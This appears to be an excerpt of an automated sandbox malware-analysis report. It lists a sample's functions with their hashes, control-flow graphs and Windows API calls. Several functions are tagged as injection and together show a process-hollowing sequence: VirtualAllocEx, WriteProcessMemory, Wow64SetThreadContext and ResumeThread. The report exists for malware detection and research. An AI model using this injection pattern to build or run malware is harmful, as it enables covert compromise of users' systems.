                                                          • Instruction ID: 7299a5d9a8f617698ed9cf9886e26a34226cc591744d6860024c954c85b07b96
                                                          • Opcode Fuzzy Hash: ce79188d0fa30b16586c17ce709333793e48bca7466f94ad27b06d618075610a
                                                          • Instruction Fuzzy Hash: 4B41D071C0071DCBEB24DFAAC944B9EBBB5BF88704F20816AD418BB251DB756946CF90
                                                          Function 04EB40A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 774 4eb40a0-4eb40dc 776 4eb418c-4eb41ac 774->776 777 4eb40e2-4eb40e7 774->777 783 4eb41af-4eb41bc 776->783 778 4eb413a-4eb4172 CallWindowProcW 777->778 779 4eb40e9-4eb4120 777->779 780 4eb417b-4eb418a 778->780 781 4eb4174-4eb417a 778->781 786 4eb4129-4eb4138 779->786 787 4eb4122-4eb4128 779->787 780->783 781->780 786->783 787->786
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04EB4161
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2318320034.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_4eb0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 6db0f3134283f9c253ea9462d325c96175146a8761383d40455c80afb26cd22e
                                                          • Instruction ID: 41e4085ad5b068afe057ad8bcdde8b05a4b5db77c5b46f95dac1c8f6cc6d0d52
                                                          • Opcode Fuzzy Hash: 6db0f3134283f9c253ea9462d325c96175146a8761383d40455c80afb26cd22e
                                                          • Instruction Fuzzy Hash: 254135B4A003099FDB15CF89C848AABBBF5FB88314F24C559D558AB361D374A841CBA0
                                                          Function 07000CA0 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 789 7000ca0-7000cb2 790 7000cba-7000cc5 789->790 799 7000cb5 call 7000ca0 789->799 800 7000cb5 call 7000c8f 789->800 791 7000cc7-7000cd7 790->791 792 7000cda-7000d6c CreateIconFromResourceEx 790->792 795 7000d75-7000d92 792->795 796 7000d6e-7000d74 792->796 796->795 799->790 800->790
                                                          APIs
                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07000D5F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320117943.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7000000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: 257d7e56e8dc0795c5c7bc9f83b1f991ae5b8c3a8693ec2b9c87b440382e9a65
                                                          • Instruction ID: 0fd91224bc68784353f47a7be424162264ee5c861a806a182967e2b9b616db7a
                                                          • Opcode Fuzzy Hash: 257d7e56e8dc0795c5c7bc9f83b1f991ae5b8c3a8693ec2b9c87b440382e9a65
                                                          • Instruction Fuzzy Hash: 54318AB29043599FDB118FA9D804ADEBFF8EF09320F14805AE554A7251C335A950CBA1
                                                          Function 07024160 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 801 7024160-70241b6 804 70241c6-7024205 WriteProcessMemory 801->804 805 70241b8-70241c4 801->805 807 7024207-702420d 804->807 808 702420e-702423e 804->808 805->804 807->808
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070241F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 34f4bddd1a419086a9d34728b5be9fd0528d74d8b6a97d2849ca92c8e25a7ad8
                                                          • Instruction ID: 2909df08c34cc4ad44f29f2e4845e0d52ef71ffbecfa6a76c0a88c8734908de2
                                                          • Opcode Fuzzy Hash: 34f4bddd1a419086a9d34728b5be9fd0528d74d8b6a97d2849ca92c8e25a7ad8
                                                          • Instruction Fuzzy Hash: A72139B690035A9FDB10CFA9C881BDEBBF5FF48310F108429E918A7240D7789955DBA5
                                                          Function 00ECD4D8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 812 ecd4d8-ecd4da 813 ecd4dc 812->813 814 ecd4e0-ecd51f 812->814 815 ecd522-ecd574 DuplicateHandle 813->815 816 ecd4de 813->816 814->815 817 ecd57d-ecd59a 815->817 818 ecd576-ecd57c 815->818 816->814 818->817
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ECD4A6,?,?,?,?,?), ref: 00ECD567
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 849ca7f70d4f64df7c0b6827dda71779a06bcde99bb6d670df78841209478d05
                                                          • Instruction ID: 416624a323b486de40cf7fd89abeb5eaa21e899e60e47ca2d667a4d2b9860102
                                                          • Opcode Fuzzy Hash: 849ca7f70d4f64df7c0b6827dda71779a06bcde99bb6d670df78841209478d05
                                                          • Instruction Fuzzy Hash: C32148B580424ADFDB10CFA9D984BDEBFF4FB48324F24811AE954A7250C375A941CFA0
                                                          Function 07024168 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 821 7024168-70241b6 823 70241c6-7024205 WriteProcessMemory 821->823 824 70241b8-70241c4 821->824 826 7024207-702420d 823->826 827 702420e-702423e 823->827 824->823 826->827
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070241F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: b3dc218b9ab6d008d8e49a43dc35f1cd3e3fd8d8455a55b6ccec61cfa481632c
                                                          • Instruction ID: caff2a812a5db028195f30d5b2899a4de90b0185fab556aed61353ae3b310a81
                                                          • Opcode Fuzzy Hash: b3dc218b9ab6d008d8e49a43dc35f1cd3e3fd8d8455a55b6ccec61cfa481632c
                                                          • Instruction Fuzzy Hash: BE215AB290035A9FDF10CFA9C881BDEBBF5FF48310F108429E918A7240C7789955DBA1
                                                          Function 07023FC8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 831 7023fc8-702401b 834 702402b-702405b Wow64SetThreadContext 831->834 835 702401d-7024029 831->835 837 7024064-7024094 834->837 838 702405d-7024063 834->838 835->834 838->837
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0702404E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 81ba7636890794cfdc53356390642977563958ec36e737a25919d881eb269669
                                                          • Instruction ID: 9d2ac21be5d2f407b2b8e25c32b258394ca34708ec6f3d26838e20e8b0ac99f8
                                                          • Opcode Fuzzy Hash: 81ba7636890794cfdc53356390642977563958ec36e737a25919d881eb269669
                                                          • Instruction Fuzzy Hash: 45219DB290034A8FDB10CFAAC4847EEBBF4EF48320F14842AD559A7240C7789985CFA1
                                                          Function 07023F1A Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 842 7023f1a-7023f1c 843 7023f1e-7023f29 842->843 844 7023f2f-7023f36 842->844 843->844 846 7023f37-7023f8f ResumeThread 844->846 847 7023eff-7023f0a 844->847 850 7023f91-7023f97 846->850 851 7023f98-7023fbd 846->851 850->851
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: efe6c77313a2b321fa46815efc54ae9e3a2ae88c1a69e84b79247cf1829bef62
                                                          • Instruction ID: 02c8285cf9908cd8565988726da49d70a09d84952e1eca6da1ba29beea078b2c
                                                          • Opcode Fuzzy Hash: efe6c77313a2b321fa46815efc54ae9e3a2ae88c1a69e84b79247cf1829bef62
                                                          • Instruction Fuzzy Hash: 362198B2D003599FCB10DFAAD4447DEFBF4EF48214F24855AD419A7200D7796901CB94
                                                          Function 07024252 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 855 7024252-70242e5 ReadProcessMemory 859 70242e7-70242ed 855->859 860 70242ee-702431e 855->860 859->860
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070242D8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 1ca33b691c41b208993ccccfd2c486443d8d4e59735dc25f4b10c7c911e36098
                                                          • Instruction ID: 79c49923502396bbcf4a69fa5bf8385a5694e9301df519d6eb129fef93c546fd
                                                          • Opcode Fuzzy Hash: 1ca33b691c41b208993ccccfd2c486443d8d4e59735dc25f4b10c7c911e36098
                                                          • Instruction Fuzzy Hash: 142139B190035A9FDB10CFAAC880ADEFBF5FF48310F508429E558A7240D778A915DBA5
                                                          Function 00ECB538 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ECD4A6,?,?,?,?,?), ref: 00ECD567
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: d7f3a870655fc9d02d6191e22bbd722e60b561421bcf67b5535a9fc727d3556e
                                                          • Instruction ID: c411ce0b61e4eb2586fa172411aaaf27dcccc148736864dbf53ac8bf89541534
                                                          • Opcode Fuzzy Hash: d7f3a870655fc9d02d6191e22bbd722e60b561421bcf67b5535a9fc727d3556e
                                                          • Instruction Fuzzy Hash: 1B21D4B5904209DFDB10CF9AD984ADEBBF4FB48324F14801AE914A3310D379A951CFA5
                                                          Function 07023FD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0702404E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 6ff0c13e224e86ae761074d550a40ead97e7709503c3895880845a9d40888e7a
                                                          • Instruction ID: c1bc34680c25bf79859db332eddff2894b50af7cb13faf72d9fdae6bfeecc86c
                                                          • Opcode Fuzzy Hash: 6ff0c13e224e86ae761074d550a40ead97e7709503c3895880845a9d40888e7a
                                                          • Instruction Fuzzy Hash: 212149B290030A8FDB10DFAAC4857EEBBF4FF88324F148429D559A7240CB789945CFA5
                                                          Function 07024258 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070242D8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: a9ce8560bedf18e93b993722750e10077dead8e9399cb5b059757b83ad5edb63
                                                          • Instruction ID: 22d6558b8a8df8d6658d75e7140e437d0894f71797cabd676120bf603e4cad71
                                                          • Opcode Fuzzy Hash: a9ce8560bedf18e93b993722750e10077dead8e9399cb5b059757b83ad5edb63
                                                          • Instruction Fuzzy Hash: 302128B190035A9FDB10CFAAC881BDEBBF5FF48310F508429E518A7240C778A915DBA5
                                                          Function 070240A0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07024116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 605043c145548f00919bd5cd932c59770928cfa12ad37d93d732cc67ebef3586
                                                          • Instruction ID: a9e06af0808c3676f8565f6d0558b8e22e948770af3edd86bec352df0955a00a
                                                          • Opcode Fuzzy Hash: 605043c145548f00919bd5cd932c59770928cfa12ad37d93d732cc67ebef3586
                                                          • Instruction Fuzzy Hash: A111897290034A9FDF10DFA9C8447DEBFF1EF88320F24841AE559A7240C7799941CBA1
                                                          Function 070240A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07024116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 8849f5de132c3813cc2e4e94810c08628f1bc88d865063135fd054b7ce916e7b
                                                          • Instruction ID: a7ee0f313955e3746dcc99615ea38ee3d899a96593c34d11a5d0cce6ab56ac07
                                                          • Opcode Fuzzy Hash: 8849f5de132c3813cc2e4e94810c08628f1bc88d865063135fd054b7ce916e7b
                                                          • Instruction Fuzzy Hash: 5011267290034A9FDB10DFAAC845BDEBBF5EF88320F248419E519A7250C779A950DBA1
                                                          Function 07023F20 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 063f538669944fd46e6219e30beaf7f95caecf961b8fe2ab619331537104a178
                                                          • Instruction ID: 794b8f4d346a31ce212d6ff95071e23b663038d32cca4f1d5786492603287c0c
                                                          • Opcode Fuzzy Hash: 063f538669944fd46e6219e30beaf7f95caecf961b8fe2ab619331537104a178
                                                          • Instruction Fuzzy Hash: 671136B190034A8FDF20DFAAD44579EFBF4EF88724F248419D519A7240CB79A941CBA5
                                                          Function 07027E90 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07027EF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: f712a9ed43f6fca1d02a63e5252a3f47d9dd999fefcc13e780c53090746fa11c
                                                          • Instruction ID: b5a94a109a420dbe802be713cbe3be23b21e12f0f3f578fb70d8789ef4743707
                                                          • Opcode Fuzzy Hash: f712a9ed43f6fca1d02a63e5252a3f47d9dd999fefcc13e780c53090746fa11c
                                                          • Instruction Fuzzy Hash: 4F1116B580438A9FCB10CF99C484BDEFFF4EB48320F20841AD554A3601D375A554CFA1
                                                          Function 00ECB0D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00ECB13E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 6ca69ec7ecc8c304bbab544155fca92eef7137d8033527c94231474fa7fda578
                                                          • Instruction ID: f7457d4f941a70a33446aba3020417f00465157c37ba2edca7ebcc28e52d850e
                                                          • Opcode Fuzzy Hash: 6ca69ec7ecc8c304bbab544155fca92eef7137d8033527c94231474fa7fda578
                                                          • Instruction Fuzzy Hash: 4C1102B5C007498FDB10CF9AD544B9EFBF4AB88324F14841AD418B7200C379A545CFA1
                                                          Function 070252C8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07027EF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 7827463390c56236dd7f7cb5dd3c8d9880d15fe5680dd58e619ba225792c7439
                                                          • Instruction ID: 7e60613fd47dcc2c759a470a0f8203c4713016d2320e788f7934f2e9f41c9572
                                                          • Opcode Fuzzy Hash: 7827463390c56236dd7f7cb5dd3c8d9880d15fe5680dd58e619ba225792c7439
                                                          • Instruction Fuzzy Hash: D31106B6804359DFDB20CF99D445BDEBBF8FB48324F108419E558A7610D375A944CFA1
                                                          Function 00AED4C4 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313873402.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_aed000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f80079f7e012a277b9c44c853153498872a248e455ad13e567f715056973e1c2
                                                          • Instruction ID: 59d9412ed8285a48e6116346b90334aaa856624583479e9e40bb0e96b22da10b
                                                          • Opcode Fuzzy Hash: f80079f7e012a277b9c44c853153498872a248e455ad13e567f715056973e1c2
                                                          • Instruction Fuzzy Hash: 82212572504280EFDB05DF15D9C0B2ABF65FB98318F20C56DE9090B256C336D856CAB1
                                                          Function 00AFD01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313937866.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_afd000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce42f88273978f601eaace4863f3639f818b61643e53436bcfb36377d057ade1
                                                          • Instruction ID: 116b27fbebba2393410608081144a3617392b831e867291175ff9db4cd7138cd
                                                          • Opcode Fuzzy Hash: ce42f88273978f601eaace4863f3639f818b61643e53436bcfb36377d057ade1
                                                          • Instruction Fuzzy Hash: 26212275604208EFDB16DF54D9C0B26BB62FB84314F20C56DEA0A4B296CB7AD807CA61
                                                          Function 00AFD1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313937866.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_afd000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d4df38e968ee7738fcb3990b56a77a243f68f28324b6050163fa0071bc4312f
                                                          • Instruction ID: 0d5505cb23a07c128fb524f607e7d62d29536a02f4bda150ba8a137677b83ba4
                                                          • Opcode Fuzzy Hash: 0d4df38e968ee7738fcb3990b56a77a243f68f28324b6050163fa0071bc4312f
                                                          • Instruction Fuzzy Hash: F9212975504308EFDB06DF94D5C0B76BB66FB84314F20C56DFA094B252C776D846CAA1
                                                          Function 00AFD006 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313937866.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_afd000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ee5ee753022fdcba6b895ab8f2cce931fbd3a0638f763df3f615906f52815cb
                                                          • Instruction ID: 85f1806ed50202848b5919be3a94e667122c2856461895865ac046896c04482a
                                                          • Opcode Fuzzy Hash: 4ee5ee753022fdcba6b895ab8f2cce931fbd3a0638f763df3f615906f52815cb
                                                          • Instruction Fuzzy Hash: 25218E755093C48FCB03CF20D990715BF72EB46314F28C5EAD9498B6A7C33A980ACB62
                                                          Function 00AED4BF Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313873402.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_aed000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction ID: 56e26114e0e68101621992a477d3f32d79a0c9aff944fdca28838553295e7211
                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction Fuzzy Hash: 5A11E676504280CFCB15CF10D9C4B16BF71FB94318F24C6A9D8490B656C33AD856CBA1
                                                          Function 00AFD1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313937866.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_afd000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: bf6f41d93c7eebcf186459c1f02f3c6ff0f024cc57c3056c38e98c39b69ecdcd
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: 6C11D075504284DFCB02CF50C5C0B65FB72FB84314F24C6AEE9494B256C33AD80ACB91
                                                          Function 00AED745 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313873402.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_aed000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb6cf81411d2b086ec1f5e561c4b879f117b8f6030fdfb9429fd7d369d3e8f47
                                                          • Instruction ID: a449c532f9cbf7d53fd863a971fada9b67bded09b660ad4b752baf2f42dbca41
                                                          • Opcode Fuzzy Hash: eb6cf81411d2b086ec1f5e561c4b879f117b8f6030fdfb9429fd7d369d3e8f47
                                                          • Instruction Fuzzy Hash: 060126724083809AE7104F26CD84B26BFA8EF41324F18C51AEE091E286C7B99840CAB1
                                                          Function 00AED744 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2313873402.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_aed000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f6c2c60c66f2b9a6f42166b320dc6be7e393a48d2103dcf12dc28169293a1a9
                                                          • Instruction ID: ed3173bd70774dcbeeb0a478fece2539c23b0f3ed2c75c8fb5234f73ec45d3f7
                                                          • Opcode Fuzzy Hash: 3f6c2c60c66f2b9a6f42166b320dc6be7e393a48d2103dcf12dc28169293a1a9
                                                          • Instruction Fuzzy Hash: DEF062724053849AE7108F16D984B62FF98EB91734F18C45AED485E286C3799C44CBB1

                                                          Execution Graph

                                                          Execution Coverage:10.9%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:30
                                                          Total number of Limit Nodes:1
                                                          execution_graph 38525 6bc6361 38526 6bc62fc 38525->38526 38527 6bc636a 38525->38527 38531 6bc7400 38526->38531 38535 6bc73f1 38526->38535 38528 6bc631d 38532 6bc7448 38531->38532 38533 6bc7451 38532->38533 38539 6bc6f98 38532->38539 38533->38528 38537 6bc738d 38535->38537 38536 6bc7451 38536->38528 38537->38535 38537->38536 38538 6bc6f98 LoadLibraryW 38537->38538 38538->38536 38540 6bc75f0 LoadLibraryW 38539->38540 38542 6bc7665 38540->38542 38542->38533 38543 18c0871 38544 18c0889 38543->38544 38547 18c08c8 38543->38547 38552 18c08d8 38543->38552 38548 18c08d8 38547->38548 38557 18c0ce8 38548->38557 38561 18c0ce0 38548->38561 38549 18c093e 38549->38544 38553 18c08fa 38552->38553 38555 18c0ce8 GetConsoleWindow 38553->38555 38556 18c0ce0 GetConsoleWindow 38553->38556 38554 18c093e 38554->38544 38555->38554 38556->38554 38558 18c0d26 GetConsoleWindow 38557->38558 38560 18c0d56 38558->38560 38560->38549 38562 18c0d26 GetConsoleWindow 38561->38562 38564 18c0d56 38562->38564 38564->38549

                                                          Executed Functions

